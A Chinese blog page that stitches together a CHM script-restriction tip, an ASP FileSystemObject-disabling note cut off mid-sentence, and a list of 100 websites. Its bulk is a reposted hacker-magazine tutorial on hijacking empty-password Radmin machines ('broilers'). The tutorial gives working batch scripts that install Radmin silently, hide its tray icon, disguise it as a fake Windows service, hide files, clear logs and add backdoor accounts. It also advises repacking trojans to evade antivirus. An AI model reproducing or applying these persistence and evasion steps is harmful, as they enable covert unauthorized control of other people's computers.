其实 CHM 文件里的内容大多是 HTML 文件,而通过加入脚本可以屏蔽鼠标右键、鼠标选择等操作,所以我们通过更改本地的区域安全设置就可以达到解决限制的目的。
即通过更改“Internet 属性”里的“我的电脑”区域的“安全设置”(此“我的电脑”默认是不显示的),通过它来屏蔽脚本就可以解除 CHM 文件中的限制了。
定位到注册表的[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0],将这个注册表项导出后备份,然后将右边窗口的“Flags”改成“db”(十六进制的,如果是十进制则是219),确定后关闭注册表,然后右击桌面的“Internet Explorer”→属性→打开“Internet 属性”→安全→这时你会发现多了一个“我的电脑”,选择它后点“自定义级别”,然后找到“活动脚本”的选项→把它选择为“禁用”→确定,这时你再打开 CHM 文件就不会有限制了。
最后,如果要恢复“我的电脑”的默认级别,只要把前面导出的备份注册表文件重新导入即可。
另外,“我的电脑”区域的安全级别一般情况下不要乱动,否则会出现一些问题。
分类 : 社会文摘 | 发表时间 12-04-2006
众所周知,FileSystemObject组件的强大功能及破坏性是它屡屡被免费主页
提供商(那些支持ASP)的禁用的原因,我整理了一下,本来只找到两种方法,后来
被某人一刺激,硬是想到第三种不为人所知的方法,呵呵,也不知道是不是这样的。
第一种:用RegSrv32 /u C:\WINDOWS\SYSTEM\scrrun.dll(win98路径)来注销该组
件。此方法过于狠毒,属于同归于尽的方法,大家都没得用,是下招
第二种:修改Progid的值,在ASP里调用组件的方式通常是 Set 对象名=Server.
CreateObject(“Progid”),这时候我们就可以通过修改注册表中的Progid值从达
到禁用该组件的方法。在 开始-运行中敲入regedit,然后找到HKEY_CLASSES_ROO
T\scripting.FileSystemObject,这时候我们就可以更改该Progid的值了,如改
成scripting.FileSystemObject8。这样在ASP页里就这样调用了:
<%@ Language=Vbscript%>
<%
Set Fs=Server.CreateObject(“scripting.FileSystemObject8″)
%>
(如果你前面没有调用过该组件的话,则无须重启,就可以看到效果了,否则请重
启后看效果。)
这时候我们看看还是用原来的调用方法的结果:
<%@ Language=Vbscript%>
<%
Set Fs=Server.CreateObject(“scripting.FileSystemObject”)
%>
这时候的运行结果为:
服务器对象 错误 ‘ASP 0177 : 800401f3′
Server.CreateObject 失败
/aspimage/testfile2.asp, 行3
800401f3
(OK,达到我们的要求)
该方法由于本人迟了两步,结果就让别人抢着回答了,这样极大的刺激了我,结
果就产生了第三种方法。
第三种:细心的高手们会想,既然能通过修改Progid值来禁用该组件,那Clsid是
否也可以来修改呢?(OK,你想得和我一样)我们知道,除了CreateObject方法以
外,也可以使用一般的
分类 : 网络日志 | 发表时间 02-04-2006
1 猫扑 http://www.mop.com
2 和讯 http://www.hexun.com
3 豆瓣网 http://www.douban.com
4 奇虎 http://www.qihoo.com
5 网易博客 http://blog.163.com
6 噢噢中国 http://www.oo.cn
7 百度贴吧 http://post.baidu.com
8 新浪博客 http://blog.sina.com.cn
9 网络秀 http://www.m149.com/
10 客齐集 http://www.kijiji.com.cn
11 VeryCD http://www.verycd.com/
12 Donews http://www.donews.com
13 天涯社区 http://www.tianya.cn
14 土豆网 http://www.toodou.com
15 大旗网(原ChinaBBS) http://www.daqi.com/
16 58同城分类 http://www.58.com/
17 周博通 http://www.potu.com
18 大众点评网 http://www.dianping.com
19 BlogCN http://www.blogcn.com
20 博客网 http://www.bokee.com
21 Zcom智通 http://www.zcom.com
22 fotoal http://www.fotoal.com/
23 fotolog http://www.fotolog.com.cn/
24 优友地带 http://www.uuzone.com
25 赛我网 http://www.cyworld.com.cn
26 YOK优客搜索 http://www.yok.com
27 My See http://www.mysee.com/
28 CSDN http://www.csdn.net
29 楚现会 http://www.appiir.com
30 feedsky http://www.feedsky.com
31 365Key http://www.365key.com/
32 摩网 http://www.moabc.com
33 菠萝网 http://www.podlook.com
34 影立驰 http://www.tvix.cn/
35 E都市 http://www.edushi.com/
36 银河台 http://www.radio.cn
37 邦邦网 http://www.81088.com
38 口碑网 http://www.koubei.com
39 Blogbus http://www.blogbus.com/
40 网库黄页 http://www.99114.com
41 xplus http://www.xplus.com.cn
42 看天下 http://www.kantianxia.com
43 POCO http://www.poco.cn
44 CNCN城市平台 http://www.cncn.com/
45 聚网 http://www.365ju.com/
46 爆米花网 http://www.pomoho.com
47 快乐米 http://www.colorme.com.cn
48 qzone http://qzone.qq.com/
49 磊客中国 http://www.rox.com.cn/
50 职友集 http://www.jobui.com
51 亿友 http://www.yeeyoo.com/
52 联络家 http://www.linkist.com/
53 PPlive http://www2.pplive.com/
54 波普播客 http://www.imboke.com
55 天际网 http://www.tianji.com
56 拍客地带 http://www.fzone.cn
57 搜狐博客 http://blog.sohu.com/
58 Mapbar http://www.mapbar.com/
59 赶集 http://www.ganji.com/
60 又拍网 http://www.yupoo.com/
61 乐视网 http://www.le-tv.com
62 万蝶移动博客 http://www.pdx.cn
63 狗狗 http://www.gougou.com/
64 乐乐互动 http://www.lele.com/web/
65 3G门户网 http://www.3g.net.cn
66 Cblinkx TV www.cblinkx.tv
67 滚石音乐网 http://irock.cn/
68 粉丝网 http://www.ifensi.com
69 我要(51) http://www.51.com
70 易登网 http://www.edeng.cn
71 K68 http://www.k68.cn
72 中国播客网 http://www.vvlogger.com
73 那里网 http://www.naalee.com
74 Teein帖易中文聚合门户 http://www.teein.com
75 众评 http://report.7234.com/
76 酷客音乐网 http://www.koook.com
77 淘职网 www.go2work.com.cn
78 捉鱼网 http://www.joyes.com
79 新聚网 http://www.tagriver.com
80 We@link http://www.wealink.com
81 网眼 http://www.webeye.net.cn
82 中国交友中心 http://www.96333.com
83 博易 http://www.anyp.cn/
84 中国114黄页 http://www.114chn.com
85 TOM博客 http://blog.tom.com
86 圈网你我他 http://www.niwota.com
87 94pop流沙歌秀 http://www.94pop.com
88 本地通 http://www.bodoto.com
89 爬狗 http://www.pagou.com
90 歪酷博客 http://www.yculblog.com
91 天方有声图书 http://www.tingbook.com
92 中国博乐网 http://www.boloo.com
93 小蜜蜂 http://www.com.tv
94 播客宝典 http://www.hopesome.com
95 爱米网 http://www.aimi.cn
96 嘻哈哈 http://www.seehaha.com
97 人脉招聘网 http://www.rmzp.com
98 分类哥哥 http://www.fenleiGG.com
99 Komoo http://www.komoo.com
100 碰碰网 http://www.pengpeng.com
文章作者:魔女の条件 [黑客基地](www.hackbase.com)
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章首发于《黑客X档案》2005年01月刊(傻瓜黑客) 转载请注明版权归《黑客X档案》所有
对于4899肉鸡,相信大家都不会陌生吧。Radmin远程控制软件最大的优点就是功能齐全,便于操作,能够躲避一些软件的查杀。实在是居家旅行,杀人灭口,绝好武器。那么……有的朋友要问了多么好的宝马良驹在哪里可以找到啊?问的好,各大黑客网站均能下载,童叟无欺啊!(这段对白怎么这么耳熟啊?)
第一章 4899空口令肉鸡争夺战
4899空口令肉鸡是由一些超级菜鸟们用Windows NT/2000 自动攻击探测机对他感兴趣的某段IP细心的,无微不至的扫描孕育而生的~~~(鼓掌,有请我们今天的主角,4899空口令肉鸡隆重登场,哎呀,谁拿西红柿扔我?忒不讲公德呢?扔也不扔个红的,绿的怎么吃啊?)
既然4899空口令肉鸡这个多,那么偶就先从它的由来说起吧!Windows NT/2000 自动攻击探测机 这款扫描软件不但集成了扫描器的特点,还添加了一些漏洞的利用功能。它能够对扫描出IIS溢出的,弱口令的和SA空口令的电脑上传并安装远程图形控制软件Radmin,即把R_Server.exe,AdmDll.dll和raddrv.dll这三个文件上传到其电脑系统跟目录%systemroot%\system32子目录下,并行运行R_Server.exe可执行文件。由于远程上传的Radmin没有经过配置,因此在对方机子的任务栏里出现了Radmin服务程序的托盘(如图1-1)。这样不就成个此地无银三百两,机器的主人一定能发现这个不正常的托盘。我想他第一个动作就是把鼠标移动到托盘位置,一点就显示出了有某某IP正在连接本机。如果是个只知道上网聊天的MM她第一个动作就是把网断了,逃过别人的控制再说。如果是个有经验的老鸟那么各位就要小心了,他会通过显示出的IP查到你的电脑或者你用来扫描的肉鸡,这样就大大的不妙了。所以了,这个托盘的隐藏是非常必要和急切的。
在做我们的工作之前,要做好一些准备活动。首先把4899空口令肉鸡设置上密码,在Radmin的CMD控件下输入命令r_server.exe /port:520 /pass:hackbase /save /silence。有些同僚总是抱怨这个命令不好用,我看过他们出问题的动画。无论是在CMD命令下或者在“运行”下输入这个命令都是正确的,而他们出错的原因就是没有添加参数“/save”保存,和参数“/silence”后台安装。这样设置好连接端口和密码,同道中人就算用“4899空口令扫描器”扫到你做的肉鸡也晚了,偶已经添加过密码了,而端口在肉鸡重起后能够修改成功。接下来我们就要把一个反弹木马放到肉鸡上,以免对方是动态IP,肉鸡就飞掉了。这里我们可以用灰鸽子VIP或黑洞2004这两个反弹木马都很不错的哦~~~。顺便说一句您的木马一定要做过特征码修改或者加壳啊,这样能够躲避对方杀毒软件的查杀。在这里再说句题外话对木马加壳不是加的壳越多就越安全的,这样大家就走入了多加壳的误区。这样不但不能躲过杀毒软件的查杀,还有可能使木马的功能受到影响。对喜欢加壳躲杀毒软件的朋友偶建议下先把木马脱壳,然后再加个不知名的壳(ASPack, UPX这些加壳软件的壳已经被有些杀毒软件列入黑客程序列表了),然后在用几款世面流行的杀毒软件在本地机器事先做个放杀毒检测。
这样的黑客程序才是我们的杀手锏。
前期工作制作完毕后,您就可以耐心的工作了。为了做到隐藏托盘的目的,偶想了两个办法:
第一, 在您的机器上事先安装并配置好Radmin,把注册表中的HKEY_LOCAL_MACHINE\SYSTEM\RAdmin导出为radmin.reg,这个就是绝对符合您意愿的Radmin配置,把radmin.reg上传到对方机器输入命令regedit /s radmin.reg。这样在机器重起或者您帮助他重起Radmin服务的时候,任务栏里的Radmin托盘就消失了。
第二, 写个批处理文件重新调整Radmin配置。批处理文件内容如下:
@echo off
@r_server.exe /port:520 /pass:hackbase /save /silence
echo Windows Registry Editor Version 5.00 >ftp.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters] >>ftp.reg
echo “DisableTrayIcon”=hex:01,00,00,00 >>ftp.reg
regedit /s ftp.reg
del ftp.reg
到这里菜鸟的“保鸡”反击战已经告一段落。刚才我们不是还放了个灰鸽子吗,这样这台肉鸡上就有我们的两匹宝马良驹了。小样让你跑,还是逃不出如来佛的掌心吧!呵呵,我得意的笑~~~
在长期的摸索研究工作中,偶发现个Windows NT/2000 自动攻击探测机的小BUG。等偶慢慢道来,各位看官听仔细啊。Radmin 3.0影子版的客户端是Radmin公司开发的,而服务端程序缺因为种种原因,没有和各位见面。有的说是Radmin公司在开发新的功能,服务端没有开发完;有的说Radmin公司现在只对付费用户提供服务端,这些偶就不得而知了。可是我们敬爱的影子为我们制造出了“Radmin 3.0服务端”其本质就是2.0版本的部分修改,对其图标做了修改和加壳处理。可是在汉化过程中,不知道什么原因,它在任务栏里的Radmin托盘变成了一个空白的地方,要是不注意是看不出来的(如图1-2、1-3)。所以了,我们在运行Windows NT/2000 自动攻击探测机扫描机子的时候,把它同目录下释放出来的R_Server.exe,替换成3.0版本的R_Server.exe。这样扫描出来上传图形控制软件的机器,在其任务栏里就出现了一个空白的地方。当把鼠标点到上面的时候也没有了某某IP正在连接的提示,这样就欺骗了一些机主。呵呵,旁门左道大家不要见笑啊。可是这个小BUG启发了我的另一个思路,就是把我们的Radmin.exe自动运行的配置包重命名为R_Server.exe,然后替换掉R_Server.exe,我们不就有了所以自己的机子了吗?好,说干就干。把我的Radmin自解压包替换掉R_Server.exe,可是这回Windows NT/2000 自动攻击探测机就没有了上传成功的小提示。(如图:1-4)(广告过后更精彩)我一直对这个验证方法不甚了解,想找作者问问,可是他老人家还换QQ了。哪位高手有高见,请不吝赐教,偶的QQ:9500142。言归正传,那也难不倒我,我们把扫描出来有漏洞的所有IP复制到一个文本文件中,用superscan导入IP列表,扫描我设置Radmin服务的端口,这样被我上传Radmin的机器就都上门报道了。Yeah!(如图:1-5)
第二章 Radmin 服务端高级配置
既然我们对Radmin这么情有独钟,那么我们就要打造不死系的超级后门木马。具推断当前安装过Radmin控制软件的肉鸡占安全性低级的电脑的80%左右,所以我们上传木马之前,要把其系统中可能存在的Radmin服务停止掉,替换成我们的服务为己所用。绝大部分的安装Radmin的肉鸡都是用的R_Server.exe程序。可是种植的原始情况分为两种:
第一 就如上面所说那样,是用Windows NT/2000 自动攻击探测机上传安装的,其安装服务的名称为“radmm”。启动和停止该服务的命令分别为“net start radmm”和“net stop radmm”。
第二 一些喜欢偷懒的朋友,把自己的Radmin是默认的R_Server.exe程序,其安装服务的名称为“Remote Administrator Service”。启动和停止该服务的命令分别为“net start r_server”和“net stop r_server”。
偶发现一个对付这两种配置的小窍门,就是可以用“r_server.exe /start”和“r_server.exe /stop”启动和停止服务,然后我们在替换为自己的配置。
Follow Me!
对配置Radm
in自解压程序的,我有两个思路可供大家参详,希望对您能配置能够有所启发和帮助.
第一 就是替换系统服务的方法。如果您对Windows系统服务的工作机理不甚了解,那么请跳过这里,看接下来的第二种配置.
1、编写一个批处理文件,命名为first.bat
——————————————–
@echo off
r_server.exe /stop
——————————————–
这样做是假定肉鸡上已经由黑友安装过Radmin服务,杀无赦。
2、接下来我拿系统的ClipBook服务开刀做下替换。编写一个批处理文件,命名为baby.bat
——————————————–
@echo off
@sc stop ClipBook
@sc delete ClipBook
@sc stop r_server
@del %systemroot%\system32\AdmDll.dll
@del %systemroot%\system32\raddrv.dll
@del %systemroot%\system32\R_Server.exe
@del %systemroot%\system32\dllcache\ClipSrv.exe
@del %systemroot%\system32\ClipSrv.exe
@copy %systemroot%\system32\Setup\ClipSrv.exe
%systemroot%\system32\ClipSrv.exe
@copy %systemroot%\system32\Setup\raddrv.dll
%systemroot%\system32\raddrv.dll
@copy %systemroot%\system32\Setup\AdmDll.dll
%systemroot%\system32\AdmDll.dll
@ClipSrv.exe /install /silence
@regedit /s radmin.reg
@regedit /s server.reg
@sc config ClipBook start=auto
@sc start ClipBook
@sc delete r_server
@del radmin.reg
@del server.reg
@del sc.exe
@clss.exe
@cls
@del baby.exe
@shutdown.exe -f -r
@del first.bat
@del baby.bat
@del clss.exe
@del shutdown.exe
——————————————–
Radmin.reg注册表文件时服务配置,Sc是微软服务修改程序(比尔其实对我们还满不错的哦,嘿嘿),clss.exe是日志清除工具(大家要养成勤扫地的习惯噢!),shutdown.exe是关机程序,这个程序无关紧要,关键看您的性子怎么样了(急性子的黑友建议使用)。Server.reg就是ClipBook服务的描述信息了,要伪装当然要做的够专业啊。
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ClipSrv]
“Description”=”启用“剪贴簿查看器”储存信息并与远程计算机共享。如果此服务终止,“剪贴簿查看器” 将无法与远程计算机共享信息。如果此服务被禁用,任何依赖它的服务将无法启动。”
“DisplayName”=”ClipBook”
上面的信息是由原ClipBook服务所对应的注册表键值
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ClipSrv] 提取出来的。
因为分支包含了部分电脑路径和安全信息,每个电脑都有些许区别,所以把精炼的东西提取出来做为我们的伪装信息。
然后,把我们所用到的工具、注册表文件、批处理文件打包。配置RAR高级自解压格式所选项嘀时候,注意那个解压路径 写成%systemroot%\system32\Setup这个目录
步骤1 选择『在当前文件夹中创建』
步骤2 在『解压后运行』输入baby.bat
步骤3 在『解压前运行』输入first.bat
步骤4 选择RAR高级自解压缩选项中的『模式』改两个地方,选择『全部隐藏』和『覆盖所有文件』。命名自解压缩程序命为baby.exe
第二 就是添加一个完全属于偶嘀服务的方法。
1、编写一个批处理文件,命名为first.bat
——————————————–
@echo off
r_server.exe /stop
——————————————–
呵呵,安全第一。
2、接下来偶为我亲爱的小马创建个服务。
服务名称:wmipd
显示名称:Windows Management Instrumentation Player Drivers
编写一个批处理文件,命名为boy.bat
——————————————–
@echo off
@sc stop r_server
@del %systemroot%\system32\AdmDll.dll
@del %systemroot%\system32\raddrv.dll
@del %systemroot%\system32\R_Server.exe
@wmsrv.exe /install /silence
@regedit /s radmin.reg
@net start wmsrv
@attrib +r +h %systemroot%\system32\drivers\wmsrv.exe
@attrib +r +h %systemroot%\system32\drivers\admdll.dll
@attrib +r +h %systemroot%\system32\drivers\raddrv.dll
@regedit /s server.reg
@sc config Windows Management Instrumentation Player Drivers start=auto
@sc start Windows Management Instrumentation Player Drivers
@sc delete r_server
@del radmin.reg
@del server.reg
@del sc.exe
@clss.exe
@cls
@del boy.exe
@del first.bat
@del boy.bat
——————————————–
Radmin.reg注册表文件时服务配置,Sc是微软服务修改程序,clss.exe是日志清除工具。Server.reg就是Windows Management Instrumentation Player Drivers服务的描述信息了,要伪装当然要做的够专业啊。
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wmipd]
“Description”=”为Windows Media Player提供加载进程及为其他的移动媒体,驱动程序和库提供基层安全协议服务。”
“DisplayName”=”Windows Management Instrumentation Player Drivers”
然后,把我们所用到的工具、注册表文件、批处理文件打包。配置RAR高级自解压格式所选项嘀时候,注意那个解压路径 写成%systemroot%\system32\drivers这个目录
步骤1 选择『在当前文件夹中创建』
步骤2 在『解压后运行』输入boy.bat
步骤3 在『解压前运行』输入first.bat
步骤4 选择RAR高级自解压缩选项中的『模式』改两个地方,选择『全部隐藏』和『覆盖所有文件』。命名自解压缩程序命为boy.exe
如果在Radmin服务已经安装的前提下,还可以用Sc.exe把它的服务信息修改了,在这里我就不做演示了,大家动手做做~~~
优点:
1.在系统服务中看见的是Windows Management Instrumentation Player Drivers服务
(可以自定义)
2.服务说明是 为Windows Media Player提供加载进程及为其他的移动媒体,驱动程序和库提供基层安全协议服务
3.在cmd命令提示符下面,使用net start命令看见的是自启动服务是
Windows Management Instrumentation Player Drivers
4.在进程中看见的是wmsrv(可以自定义,在boy.bat文件中相应的位置改一下,注意不要和已有的系统进程起冲突)
第三章 Radmin的访问权限的设置
设置恰当Radmin的访问权限,能够更好的方便在线教学工作的开展,还可以让高手帮
您设置一些东西和远程维护系统,又不会担心别人窥探您的隐私或给下个木马类的好东东。
(呵呵~~~~偶不是贬低高手的道德噢,请高手们别生气~~~)
设置Radmin的访问权限的,首先要设置一个登陆用的帐号net user hackbase neugirl /add
用户所属组为user,这个权限已经够用了。
输入r_server.exe /setup命令调出Radmin服务端设置程序
步骤1 选择『设置参数』,其他参数的配置我在这就不多说了。现在我们关键讲述下『连接确定』的设置
① 如果是做在线教学工作或远程协助,在这里选择『使用用户许可』—『连接超时自动拒绝』超时时间,设置的长点。这里我设置为30秒。(如图:3-1)
② 如果您要是在肉鸡上建立的用户,使用远程操作,那么『连接确定』就不要设置了。免得跳出个要求连接的对话框把管理员吓坏了,这样就不好了。
步骤2 选择『设置密码』—『使用NT用户安全验证』,激活『确定使用』,然后点击『许可』—『添加』。然后会弹出一个『Add user/group』的会话框,点击左下角的『显示用户』,这样电脑中的所有组和用户都显示出来了。选中偶刚才新建的hackbase帐户,添加到右边的会话框中,在右上角的『存取权利』中选中您希望为hac
kbase该用户开启的访问权限。(如图:3-2)
具体权限分配:
Special access 特殊权限
All access(RTVFC) 所有权限
Full control of screen 完全控制
File transfer 文件传送
View of screen 查看屏幕
Telnet Telnet连接
Redirect 重定向(这个功能偶一直没有找到是控制什么的,请高手赐教)
No access 无权限
然后一路点OK,回到Radmin服务端设置程序后点击『安装程序』,等到安装通知提示“服务安装完成”后,在CMD命令提示符下输入命令net start r_server启动服务。
步骤3 样您在客户端连接服务端电脑的时候就弹出『输入NT用户』的对话框,在这里我填写的是 用户名:hackbase 密码:neugirl 所属域(这个可以不填写)(如图:3-3)
其中Redirect 重定向这个控制什么,偶一直没有弄明白。请请高手赐教。经过妹妹偶做过大量试验证实:Radmin的访问权限的设置适合于Windows 2000和Windows 2003系列各个版本上使用,对于Windows XP 系统Radmin的2.1和3.2版本都不支持。不知为何原因,希望高手能够指点。如果想对远程主机做Radmin的访问权限配置只要在本地主机事先建立一个帐户,然后分配所希望开放的权限,点击『安装程序』,然后在注册表[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Users]分支中就会出现您分配过权限的帐户名,在它的键值中有该用户所属域的“组”及“Radmin控制权限”,把这个注册表文件导入到远程主机中,然后在其电脑中建立了同用户名的账号,这样就全部搞定了。
有兴趣的朋友还可以建个隐藏账号作为我们的永久后门!
后记:下面还有一个我写的批处理文件,是用来定时运行Radmin程序的,虽然微软公司的系统维护工具soon和sleep都能够定时运行程序,可使用自己写的批处理文件能够达到目的,也是很欣慰的。嘿嘿
这里说明下批处理文件编写的思路:首先查询本机的当前时间,当然把批处理文件放到肉鸡上就能查肉鸡的时间了。然后把读取的时间暂时存储在内存中,把时间函数拆分为“小时”和“分钟”两部分,付值到tokens调用的两个函数中。在set /a mm=%mm%+2一句中添加上你希望延长多久再运行程序。
@echo off
color 0A
cls
Rem ===============以下是radmin.bat的内容=================
@echo off
echo 正在查询本机的当前时间
echo.
net time \\127.0.0.1 /set /y
for /f “tokens=1,2 delims=:” %%i in (“%time%”) do set /a hh=%%i & set /a mm=%%j
echo %1当前时间为%hh%:%mm%
set /a mm=%mm%+2
if /i %mm% geq 60 set /a mm=0 & set /a hh=%hh%+1
if /i %hh% geq 24 set /a hh=0
set tm=%hh%:%mm%
echo.
echo 设置启动AT命令运行的时间为%tm%
echo.
at \\127.0.0.1 %tm% net stop r_server
Rem ========================完=============================
echo ======================================================
echo 魔女の条件—Radmin自启动程序
echo 黑客基地 www.hackbase.com
echo ======================================================
echo 最多再过120秒,Radmin服务就会被启动,请稍侯…
echo 请明智地使用,否则可能导致民事或刑事处罚!
echo 欢迎到黑客基地论坛发表高见或者用QQ联系偶!
echo
echo 版权所有:魔女の条件
echo QICQ:9500142
echo E-mail:lucifer@hackbase.com
echo ——————————————————
在配置Radmin服务端的时候除了对程序的免查杀处理,还有对其程序图标作下修改,建议使用剑鹰文件合并器或用灰鸽子图标修改器修改成微软系统内部图标。对于Radmin启动隐藏请参见《黑客X档案》第九期《Radmin之自启动》,风写的这个自启动方法很有见地。
